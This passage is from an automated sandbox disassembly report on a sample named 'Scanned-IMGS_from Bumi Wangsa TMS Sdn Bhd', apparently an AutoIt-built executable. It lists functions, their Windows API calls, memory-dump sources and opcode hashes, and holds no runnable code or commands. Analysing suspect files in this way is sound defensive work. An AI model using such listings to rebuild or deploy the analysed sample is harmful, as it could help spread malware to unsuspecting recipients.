                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                        • String ID:
                                                        • API String ID: 1413079979-0
                                                        • Opcode ID: 65b9c1558656f112d37cd4872ca1a9ceb8f90a031d4633218bb17c39d2e4d410
                                                        • Instruction ID: 5c9f5787d9dc0f6234ab477502ea569d6e7914f792078b7a2948ec6862f90170
                                                        • Opcode Fuzzy Hash: 65b9c1558656f112d37cd4872ca1a9ceb8f90a031d4633218bb17c39d2e4d410
                                                        • Instruction Fuzzy Hash: 14115CB254020AAFDF01CFE4DD49FDE7BA9EF49304F048064FE04A21A0C7758D619B60
                                                        Function 00AAC19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A212F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A2134D
                                                          • Part of subcall function 00A212F3: SelectObject.GDI32(?,00000000), ref: 00A2135C
                                                          • Part of subcall function 00A212F3: BeginPath.GDI32(?), ref: 00A21373
                                                          • Part of subcall function 00A212F3: SelectObject.GDI32(?,00000000), ref: 00A2139C
                                                        • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00AAC1C4
                                                        • LineTo.GDI32(00000000,00000003,?), ref: 00AAC1D8
                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00AAC1E6
                                                        • LineTo.GDI32(00000000,00000000,?), ref: 00AAC1F6
                                                        • EndPath.GDI32(00000000), ref: 00AAC206
                                                        • StrokePath.GDI32(00000000), ref: 00AAC216
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                        • String ID:
                                                        • API String ID: 43455801-0
                                                        • Opcode ID: a590e75cae5d44c9e3f6e2a9bea8f9bba5535e6cd78c36f8e286cc9fc9e5579f
                                                        • Instruction ID: 3a0203d87d898d64702ccb27526591e056a6b0a08744524b735923583908ee39
                                                        • Opcode Fuzzy Hash: a590e75cae5d44c9e3f6e2a9bea8f9bba5535e6cd78c36f8e286cc9fc9e5579f
                                                        • Instruction Fuzzy Hash: B911097640014DBFEB129FD4DC88FEA7FADEB093A4F048021BA194A1A1D7719D56DBA0
                                                        Function 00A403A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A403D3
                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00A403DB
                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A403E6
                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A403F1
                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00A403F9
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A40401
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Virtual
                                                        • String ID:
                                                        • API String ID: 4278518827-0
                                                        • Opcode ID: 83d3bcad8738f2f963e9c0f0c761d43cf7e44be4156ef301ec6298df7cb3d4eb
                                                        • Instruction ID: 9e3c9ee9f7a9c8a842ccec6d637d4ffe601287b323d9ce60585990e3b01447a2
                                                        • Opcode Fuzzy Hash: 83d3bcad8738f2f963e9c0f0c761d43cf7e44be4156ef301ec6298df7cb3d4eb
                                                        • Instruction Fuzzy Hash: 8E016CB090175A7DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A864CBE5
                                                        Function 00A8568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00A8569B
                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00A856B1
                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00A856C0
                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A856CF
                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A856D9
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A856E0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                        • String ID:
                                                        • API String ID: 839392675-0
                                                        • Opcode ID: e2f70b9533acd42c57d147877176de8386740292be388a8cd83c677e2752d1c2
                                                        • Instruction ID: 4833f7e15817e8d3bcb9463f80867da37e50a071231ff5de0a16fc713a310eb8
                                                        • Opcode Fuzzy Hash: e2f70b9533acd42c57d147877176de8386740292be388a8cd83c677e2752d1c2
                                                        • Instruction Fuzzy Hash: AEF01D3264115ABFE7259BE2DC0DEAB7A7CEBC7B11F000169FA04D109097A11A0286B5
                                                        Function 00A874D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • InterlockedExchange.KERNEL32(?,?), ref: 00A874E5
                                                        • EnterCriticalSection.KERNEL32(?,?,00A31044,?,?), ref: 00A874F6
                                                        • TerminateThread.KERNEL32(00000000,000001F6,?,00A31044,?,?), ref: 00A87503
                                                        • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00A31044,?,?), ref: 00A87510
                                                          • Part of subcall function 00A86ED7: CloseHandle.KERNEL32(00000000,?,00A8751D,?,00A31044,?,?), ref: 00A86EE1
                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00A87523
                                                        • LeaveCriticalSection.KERNEL32(?,?,00A31044,?,?), ref: 00A8752A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                        • String ID:
                                                        • API String ID: 3495660284-0
                                                        • Opcode ID: 71851886655120ac6c7b4e33be6e887b14fe8a89b5e8bff7c89e6ffe5935f0e1
                                                        • Instruction ID: fb77c6d891e0f26b53256db65f89c6e192c1428211c0f1ebe46fe6aee93b5bd2
                                                        • Opcode Fuzzy Hash: 71851886655120ac6c7b4e33be6e887b14fe8a89b5e8bff7c89e6ffe5935f0e1
                                                        • Instruction Fuzzy Hash: 94F03A7A140613AFEB696BE4ED88AEA7B2AEF46702B100531F202910E0DB755806CB50
                                                        Function 00A78E74 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A78E7F
                                                        • UnloadUserProfile.USERENV(?,?), ref: 00A78E8B
                                                        • CloseHandle.KERNEL32(?), ref: 00A78E94
                                                        • CloseHandle.KERNEL32(?), ref: 00A78E9C
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00A78EA5
                                                        • HeapFree.KERNEL32(00000000), ref: 00A78EAC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                        • String ID:
                                                        • API String ID: 146765662-0
                                                        • Opcode ID: 8951ec6df0f928ae5ac0c19e5569454735a49214b20ee581273cba342920c2e3
                                                        • Instruction ID: af6b3ab083cc6597be4fb850fc8f5f6c92af047f1ad9212285289c35dc5c82fe
                                                        • Opcode Fuzzy Hash: 8951ec6df0f928ae5ac0c19e5569454735a49214b20ee581273cba342920c2e3
                                                        • Instruction Fuzzy Hash: 9BE0C236104002FFDB059FE1EC0C90ABB69FB8A322B108234F329850B0CB329422DB60
                                                        Function 00A98902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 00A98928
                                                        • CharUpperBuffW.USER32(?,?), ref: 00A98A37
                                                        • VariantClear.OLEAUT32(?), ref: 00A98BAF
                                                          • Part of subcall function 00A87804: VariantInit.OLEAUT32(00000000), ref: 00A87844
                                                          • Part of subcall function 00A87804: VariantCopy.OLEAUT32(00000000,?), ref: 00A8784D
                                                          • Part of subcall function 00A87804: VariantClear.OLEAUT32(00000000), ref: 00A87859
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                        • API String ID: 4237274167-1221869570
                                                        • Opcode ID: 7659085695ea148f279a91fbb5cc31a2514868c841402ee81b15a6f89888339d
                                                        • Instruction ID: d587588abcc54b7f705e41d827d91bc9e451ba07b0fdf6afd2dab3a8ccf4ab96
                                                        • Opcode Fuzzy Hash: 7659085695ea148f279a91fbb5cc31a2514868c841402ee81b15a6f89888339d
                                                        • Instruction Fuzzy Hash: C7918B716083019FCB10DF28C58596BBBF4EF8A754F04896EF89A8B361DB31E945CB52
                                                        Function 00A82F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A3FEC6: _wcscpy.LIBCMT ref: 00A3FEE9
                                                        • _memset.LIBCMT ref: 00A83077
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00A830A6
                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00A83159
                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00A83187
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                        • String ID: 0
                                                        • API String ID: 4152858687-4108050209
                                                        • Opcode ID: 29d5b1153490aa01c88f298d0d25e66fbdfa6933d4f90642e24229bb7a2538a1
                                                        • Instruction ID: d44a61ca96c2df5a061f61ac096d765c1c56bae56738cae876f76417e81989ef
                                                        • Opcode Fuzzy Hash: 29d5b1153490aa01c88f298d0d25e66fbdfa6933d4f90642e24229bb7a2538a1
                                                        • Instruction Fuzzy Hash: EA51BE326083019ADF25FF28D949A6BBBE4EF95F60F044A2DF885D7191DB70CE448792
                                                        Function 00AA9A63 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 140COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetWindowRect.USER32(0177F430,?), ref: 00AA9AD2
                                                        • ScreenToClient.USER32(00000002,00000002), ref: 00AA9B05
                                                        • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00AA9B72
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Window$ClientMoveRectScreen
                                                        • String ID: @U=u
                                                        • API String ID: 3880355969-2594219639
                                                        • Opcode ID: 0168a9cdb5a32841f09949ce78c9189439290d986ec4df59cab6720c64372672
                                                        • Instruction ID: 8c8a0dfed020e062d7703b1e38b500a864999de8a602de384638c69082386dcf
                                                        • Opcode Fuzzy Hash: 0168a9cdb5a32841f09949ce78c9189439290d986ec4df59cab6720c64372672
                                                        • Instruction Fuzzy Hash: CB510E34A00249EFCF14DF58D9819AE7BB6FF56360F14856AF9159B2E0D730AD41CBA0
                                                        Function 00A7DA5D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00A7DAC5
                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00A7DAFB
                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00A7DB0C
                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00A7DB8E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                        • String ID: DllGetClassObject
                                                        • API String ID: 753597075-1075368562
                                                        • Opcode ID: b6568eba1818eb9f0fb042558b3df6c7dd9a37d0ce3c049e8c069b84cf9fcdc6
                                                        • Instruction ID: 40f9e790d44b780c7a643b21784ff9fa86f25839e59f3b366785e3e6e59537c2
                                                        • Opcode Fuzzy Hash: b6568eba1818eb9f0fb042558b3df6c7dd9a37d0ce3c049e8c069b84cf9fcdc6
                                                        • Instruction Fuzzy Hash: 0C4180B1600209EFDB15CF64CC84A9A7BB9EF88351F15C1AAAD099F246D7B1DD40CBA0
                                                        Function 00A82C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 00A82CAF
                                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00A82CCB
                                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 00A82D11
                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00AE6890,00000000), ref: 00A82D5A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Menu$Delete$InfoItem_memset
                                                        • String ID: 0
                                                        • API String ID: 1173514356-4108050209
                                                        • Opcode ID: 922fd285dee5182a1211af6139149219573f8a0156f5ebaff764cab5615f1ae6
                                                        • Instruction ID: 1fee2805ebcdd3294f31fe7e24cc3789b45959835e6751c67b75aade80a3978e
                                                        • Opcode Fuzzy Hash: 922fd285dee5182a1211af6139149219573f8a0156f5ebaff764cab5615f1ae6
                                                        • Instruction Fuzzy Hash: 4841B1702053029FD724EF24C944B6ABBE8FF85320F144A2EF965972E1D770E905CBA2
                                                        Function 00AA8AC0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 109COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00AA8B4D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: InvalidateRect
                                                        • String ID: @U=u
                                                        • API String ID: 634782764-2594219639
                                                        • Opcode ID: 0ed0e8dfe3b9803dd9f581cf54a8a43a6e4c0cd8066e2d495fbe09363d82d21c
                                                        • Instruction ID: efeb657644a843e1c6644caf46c34535c5d90580357d2852de188f72964b12f3
                                                        • Opcode Fuzzy Hash: 0ed0e8dfe3b9803dd9f581cf54a8a43a6e4c0cd8066e2d495fbe09363d82d21c
                                                        • Instruction Fuzzy Hash: D831CFB4601214BEEF249F58CC85FAD37A4EB07350F244916FA52DB2E0DF38A9408B61
                                                        Function 00A9DAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00A9DAD9
                                                          • Part of subcall function 00A279AB: _memmove.LIBCMT ref: 00A279F9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: BuffCharLower_memmove
                                                        • String ID: cdecl$none$stdcall$winapi
                                                        • API String ID: 3425801089-567219261
                                                        • Opcode ID: 66946196cd9fca5e7eb1b0ab8e428f871cba09949b6b0ba9aea3903e71581867
                                                        • Instruction ID: 632916c7642cfc5dbbea5fc6eeee6ea50fd83422168ef22da0e67fd5738d12d0
                                                        • Opcode Fuzzy Hash: 66946196cd9fca5e7eb1b0ab8e428f871cba09949b6b0ba9aea3903e71581867
                                                        • Instruction Fuzzy Hash: 5E319675A006199FCF10DF98CD819EEB3F4FF45310B108629E866A77D1DB31AA45CB90
                                                        Function 00AA6656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A21D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A21D73
                                                          • Part of subcall function 00A21D35: GetStockObject.GDI32(00000011), ref: 00A21D87
                                                          • Part of subcall function 00A21D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A21D91
                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00AA66D0
                                                        • LoadLibraryW.KERNEL32(?), ref: 00AA66D7
                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00AA66EC
                                                        • DestroyWindow.USER32(?), ref: 00AA66F4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                        • String ID: SysAnimate32
                                                        • API String ID: 4146253029-1011021900
                                                        • Opcode ID: dec46985e6d37d3aba6bbd5d672d7c69cbc16192504f3de264b9d8fe7175e422
                                                        • Instruction ID: 9ca1ce168490fa40ce8bbe9e594b76ceaa0efee35ba5fbe756044270ceb1f95d
                                                        • Opcode Fuzzy Hash: dec46985e6d37d3aba6bbd5d672d7c69cbc16192504f3de264b9d8fe7175e422
                                                        • Instruction Fuzzy Hash: F6219D71210206AFEF148FA4EC80EBB77ADEB5A368F184629F911971E0DB71CC519B60
                                                        Function 00A8703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00A8705E
                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00A87091
                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00A870A3
                                                        • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00A870DD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
